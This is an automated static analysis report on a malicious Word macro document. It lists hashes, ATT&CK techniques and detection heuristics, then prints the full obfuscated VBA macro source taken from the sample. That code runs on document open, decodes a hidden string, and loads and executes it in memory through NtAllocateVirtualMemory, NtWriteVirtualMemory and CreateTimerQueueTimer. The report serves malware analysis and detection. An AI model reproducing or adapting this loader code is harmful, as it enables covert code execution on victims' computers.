Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 562836cf74eec979…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 250.5 KB
Created: 2018-02-22 14:08:00
Authoring application: Microsoft Office Word
First seen: 2018-03-04
MD5: 3843781b8cc55cdd5837e5adfd2e8fc0
SHA-1: 0d77d4488436f5c496ad19fa0bbab9090f7e7d63
SHA-256: 562836cf74eec97971c8311250aa1fbb90f632b06f383a87b5ffd0d0eb49b623
Risk score: 110

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic

The file contains VBA macros, including a Document_Open macro, and a heuristic indicates a lure to enable macros. ClamAV detected it as a downloader. The VBA code appears to be obfuscated, but the presence of macro execution and the downloader signature strongly suggest it is designed to fetch and execute a secondary payload. No specific family could be identified.

Heuristics (5)

  • ClamAV: Doc.Downloader.Macro-6539595-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    Private Sub Document_Open()
    Dim garner As Long
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/ [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11234 bytes
SHA-256: ee8dd307cd935ba5bfcdd39024bf5c5ef0af4b300c9aed2876e16c0e1e221b7a
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
Dim garner As Long
Dim soonest As String
succurrere
jello = 14 + 4
 Pmt 0, jello, 30053, 25323, 2
End Sub




Attribute VB_Name = "dacoity"
Attribute VB_Base = "0{B6822881-FEC9-4F29-BCFE-8474F31E2A2C}{A0AD38B0-8DEF-4930-B293-21DDB81ACDD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Attribute VB_Name = "avirgin"
#If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then
Public Declare PtrSafe Function dearest _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (endlessness As LongPtr, dans As LongPtr, ByVal commiserative As LongPtr, pattererByVal As LongPtr, headshake As LongPtr, ByVal canorous As LongPtr) As LongPtr
#End If
#If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then
Public Declare Function dearest _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (further As Long, artifactual As Long, ByVal wagner As Long, backerByVal As Long, encroach As Long, ByVal creak As Long) As Long
#End If
Public Function unlawfulness(flunk, beseechingly, mildly)
Dim anisometropic As Long
Dim mammal As Long
Dim captiousness As Long
Dim awkwardly As Long
Dim cockroach As Long
anisometropic = flunk
cockroach = mildly
arrack = hydration
captiousness = beseechingly
nonskid = 40 + 2
Pmt 0, nonskid, 8941, 44755, 5
malo = malo
mammal = 122 - 58 - 65
bleach ByVal mammal, _
anisometropic, _
captiousness, _
cockroach, awkwardly
End Function
Function textual(bubulcus, promenade, orpington)
If orpington = (22 + (10 / 2 - 5)) Then
textual = bubulcus \ promenade
ElseIf orpington = (32 + (5 - 3) / 2 - 1) Then
textual = bubulcus And promenade
ElseIf orpington = (40 + (56 / 7 - 4 * 2)) Then
textual = bubulcus * promenade
End If
End Function
Function drunkanddisorderly(juryman)
Dim doeil As Long
Dim ingrowth As String
Dim wingstem As Variant
Dim micrometeoritic As Variant
#If (104 - 102 + 398 + 83 - 59 + 276) > ((19 - 18 + 319) - (30 - 45 + 555) * 1) And ((120 - 62 - 30) - (103 - 93 + 18)) * 2 < (Win64) Then
Dim barrels As Variant
Dim coldbloodedly As LongPtr
deerberry = 26 - 117 + 99
Dim serif As LongPtr
Dim orycteropodidae As Long
Dim elicited As Byte
Dim bruchus As LongPtr
Dim buckleya As Integer
meum = VarPtr(coldbloodedly)
dangler = punster(meum, VarPtr(juryman) + (23 - 106 + 91), deerberry)
#End If
#If (118 - 107 + 389 + 24 - 84 + 360) > ((121 - 31 + 230) - (19 - 74 + 595) * 1) And Not ((44 - 98 + 82) - (96 - 88 + 20)) * 2 < (Win64) Then
Dim coldbloodedly As Long
deerberry = 73 - 58 - 11
Dim serif As Long
Dim bruchus As Long
meum = VarPtr(coldbloodedly)
dangler = unlawfulness(meum, VarPtr(juryman) + (64 - 49 - 7), deerberry)
#End If
circumfuse = 35 - 73 + 37
serif = 32 - 66 + 34
elitism = 92 - 127 + 35
bruchus = 81 - 128 + 9635
pretensions = 94 - 45 + 4047
neutrino = 62 - 23 + 25
accomplishments = dearest(ByVal circumfuse, _
serif, ByVal elitism, bruchus, ByVal pretensions, _
ByVal neutrino)
flawers = unlawfulness(serif, coldbloodedly, 78 - 57 + 5862)
palmiped = 25 + 56
Pmt 0, palmiped, 28049, 29833, 8
drunkanddisorderly = serif
End Function

Attribute VB_Name = "fixedns"
#If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then
Public Declare Function bleach _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal unannounced As Any, ByVal bluish As Any, ByVal motherhood As Any, ByVal aeneus As Any, ByVal elephantidae As Any) As Long
#End If
#If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then
Public Declare PtrSafe Function tetragonia _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (cowgirl As Any, ByVal fulgoridae As Any, ByVal abbe As Any, ByVal painfulness As Any, ByVal nationalization As Any, ByVal assemblyroom As Any, ByVal autogamous As Any) As Long
#End If
Function punster(mastering, cornerstone, flagging)
Dim emulsifier As String
Dim aluminum As Long
Dim tetanus As LongPtr
Dim aqaba As LongPtr
Dim medica As LongPtr
Dim pectic As Integer
Dim calotte As LongPtr
Dim musingly As LongPtr
malo = hydration
aqaba = mastering
musingly = flagging
hydration = "gratified"
calotte = cornerstone
cluttered = 6 + 43
Pmt 0, cluttered, 9645, 37184, 2
hydration = "induction"
tetanus = 1 - 111 + 109
bleach ByVal tetanus, _
aqaba, _
calotte, musingly, _
medica
arrack = "beadsman"
End Function
Function succurrere()
Dim aspheric As Long
Dim carry As Byte
dacoity.nonvenomous.Value = Day(#12/5/2013#)
varday = colter = symbiotically
firmware = "dives"
altimetry = "spaying"
armhole = skeg
cymbelinel = "entourage"

riptide = "scorpaenidae"
glioma = "ruddle"
Set vulvar = dacoity.nonvenomous.SelectedItem
obstetric = 37 + 57
 Pmt 0, obstetric, 28909, 23035, 3

match = vulvar.Name
loma = 70 - 127 + 7901
bedground = Right(match, loma)
eppur = compose(bedground)
minor = 32 + 55
 Pmt 0, minor, 31079, 36564, 5

kolami = "cotidal"
cordwain = "sarracenia"
#If (55 - 65 + 410 + 67 - 125 + 358) > ((102 - 64 + 282) - (115 - 37 + 462) * 1) And ((73 - 22 - 23) - (20 - 65 + 73)) * 2 < (Win64) Then
Dim coarctation As Long
Dim allay As LongPtr
Dim unilateralist As LongPtr
Dim simmer As Integer
Dim inchoative As String
Dim abloom As LongPtr
Dim megaderma As LongPtr
Dim oilseed As LongPtr
analogous = 15 - 109 + 2158
#End If
#If (124 - 67 + 343 + 120 - 3 + 183) > ((42 - 82 + 360) - (13 - 85 + 612) * 1) And Not ((1 - 114 + 141) - (90 - 47 - 15)) * 2 < (Win64) Then
Dim changeless As String
Dim unilateralist As Long
Dim combed As Variant
Dim allay As Long
Dim abloom As Long
cebu = 43 - 49 + 787
Dim megaderma As Long
Dim oilseed As Long
analogous = cebu + 3459
#End If
carborundum = 61 - 67 + 6
excessively = tuscarora
alienable = 50 - 14 + 4060
rendering = 38 + 34
Pmt 0, rendering, 12216, 39138, 6
naris = "blattodea"
timothy = embezzle
apology = "corallorhiza"
kimono = "adducent"
loll = 39 + 23
Pmt 0, loll, 19470, 36077, 3
bubbliness = eppur
composing = "donetsk"
allay = (drunkanddisorderly(bubbliness))
domini = unipolar
Dim frustrating As Variant
Dim memphis As String
abloom = 45 - 62 + 17
unilateralist = allay + analogous
megaderma = 70 - 127 + 201584
oilseed = 114 - 69 + 3455
hypernymy = (tetragonia(megaderma, abloom, _
unilateralist, abloom, abloom, _
abloom, abloom))
groupware = 3 + 9
Pmt 0, groupware, 3795, 30210, 6
End Function

Attribute VB_Name = "maimai"
#If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then
Public Declare PtrSafe Function bleach _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal amenra As Any, ByVal scot As Any, ByVal wheeziness As Any, ByVal inchon As Any, ByVal equerry As Any) As LongPtr
#End If
#If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then
Public Declare Function tetragonia _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (scott As Any, ByVal mundify As Any, ByVal swart As Any, ByVal maxime As Any, ByVal stole As Any, ByVal arpents As Any, ByVal aristate As Any) As Long
#End If
Function amidships()
Dim hobble(255) As Byte
anaphoric = 91 - 49 + 23
For i = anaphoric To (39 - 22 + 74)
hobble(anaphoric) = anaphoric - (41 - 117 + 141)
anaphoric = anaphoric + 1
If (14 - 89 + 166) < anaphoric Then
Exit For
End If
Next
anaphoric = (116 - 11 - 57)
For i = anaphoric To (38 - 18 + 38)
hobble(anaphoric) = anaphoric + (14 - 98 + 88)
anaphoric = anaphoric + 1
If (64 - 18 + 12) < anaphoric Then
Exit For
End If
Next
anaphoric = (25 - 34 + 106)
For i = anaphoric To (9 - 68 + 182)
hobble(anaphoric) = anaphoric - (116 - 93 + 48)
anaphoric = anaphoric + 1
If (125 - 71 + 69) < anaphoric Then
Exit For
End If
Next
hobble(60 - 115 + 102) = (42 - 105 + 126)
anaphoric = (29 - 32 + 46)
hobble(anaphoric) = (74 - 50 + 38)
amidships = hobble
End Function
Function compose(discriminate) As String
Dim butterfly As Long
Dim lapidation(63) As Long
Dim benefactor(6962) As Byte
Dim afraid As Integer
Dim designedly As Long
Dim audiometry(63) As Long
Dim coltsfoot As String
Dim discalced As Long
Dim monocotyledonous() As Byte
hydration = arrack
Dim autobiographical(63) As Long
Dim diapensiaceae As Long
Dim snarling As String
tabloid = 9 - 50 + 105
flowret = 3 - 84 + 16515153
xerophyllum = 33 - 33 + 258048
galore = 78 - 41 + 65243
obtruncate = 107 - 104 + 252
punily = 69 - 15 + 262090
sango = 24 - 76 + 16711732
Dim polarity As Variant
unobeyed = 108 - 44 + 4032
oxandra = 114 - 41 + 183
nonsuccess = 112 - 90 + 4010
slummocky = 96 - 45 + 65485
Dim navigability As Integer
tashmit = 60 - 14 + 17
Dim lophiidae As Long
chrysophyceae = 15 - 87 + 7915
Dim urgent() As Byte
urgent = VBA.StrConv(discriminate, 120 + 8)
porcelain = 4 + 31
Pmt 0, porcelain, 19415, 40832, 2
toweling = 7843
maidan = vbKeyShift - 12
For besteht = 0 To toweling
If besteht Mod 2 = 0 Then
urgent(besteht) = urgent(besteht) - maidan
Else
urgent(besteht) = urgent(besteht) - (maidan - 1)
End If
Next besteht
electrocardiogram = 54 + 44
Pmt 0, electrocardiogram, 4079, 52578, 7
afraid = 0
deliverer = amidships
For discalced = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
autobiographical(discalced) = textual(discalced, tabloid, 40)
audiometry(discalced) = textual(discalced, unobeyed, 40)
lapidation(discalced) = textual(discalced, punily, 40)
Next discalced
centrospermae = 36 + 55
Pmt 0, centrospermae, 36543, 43418, 6
monocotyledonous = urgent
butylene = 72 - 102 + 34
abstain = 58 + 57
 Pmt 0, abstain, 35373, 29145, 6
fitment = 27 - 48 + 24
ormazd = fitment + 1
adjudicate = 114 - 32 - 80
For butterfly = 0 To toweling
cabman = monocotyledonous(butterfly)
valve = monocotyledonous(butterfly + 2)
beggars = audiometry(deliverer(monocotyledonous(butterfly + 1)))
edmontonia = autobiographical(deliverer(valve)) + deliverer(monocotyledonous(butterfly + fitment))
diapensiaceae = lapidation(deliverer(cabman)) + beggars + edmontonia
discalced = textual(diapensiaceae, sango, 32)
benefactor(designedly) = textual(discalced, slummocky, 22)
discalced = textual(diapensiaceae, galore, 32)
benefactor(designedly + 1) = textual(discalced, oxandra, 22)
benefactor(designedly + adjudicate) = textual(diapensiaceae, obtruncate, 32)
designedly = designedly + adjudicate + 1
butterfly = butterfly + 3
Next
compose = benefactor
End Function

Attribute VB_Name = "Module1"